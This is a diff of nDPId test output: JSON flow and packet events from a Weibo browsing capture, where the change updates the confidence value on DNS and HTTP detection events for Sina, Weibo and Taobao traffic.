+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1463089073289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1463089073289,"pkt":"kDVu60UQeJKcD6iOCABFAAA+KCVAAEARjs\/AqAFpwKgBAYQeADUAKn2XkPcBAAABAAAAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAQ=="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -104,38 +103,38 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1463089073393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1463089073393,"pkt":"eJKcD6iOkDVu60UQCABFAACRAABAAEARtqHAqAEBwKgBaQA1RnMAfV+\/WFGBgAABAAMAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQABwAwABQABAAAACQAZBWFkaW1nBGdzbGIIc2luYWVkZ2UDY29tAMAzAAUAAQAAAAoADQV3ZWlibwRncmlkwD7AWAABAAEAAAAvAATeSRxg"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KDNAAEARjsDAqAFpwKgBAS4WADUAK\/dEyn0BAAABAAAAAAAAB2FjY291bnQFd2VpYm8DY29tAAABAAE="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1463089073423,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1463089073423,"pkt":"eJKcD6iOkDVu60UQCABFAACwAABAAEARtoLAqAEBwKgBaQA1oYgAnCOtK+iBgAABAAUAAAAAAmpzAXQGc2luYWpzAmNuAAABAAHADAAFAAEAAAA8AAcEd2NkbsARwCwABQABAAAAKQAVBnNpbmFqcwVjc2dsYgV0eGNkbsAYwD8ABQABAAAEEgAUCG40Y3N3aGszBWdjY2RuA25ldADAYAABAAEAAAADAARdvIb2wGAAAQABAAAAAwAEXbyG8Q=="} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA4KDhAAEARjsLAqAFpwKgBAUGkADUAJAai81YBAAABAAAAAAAAAWMFd2VpYm8CY24AAAEAAQ=="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 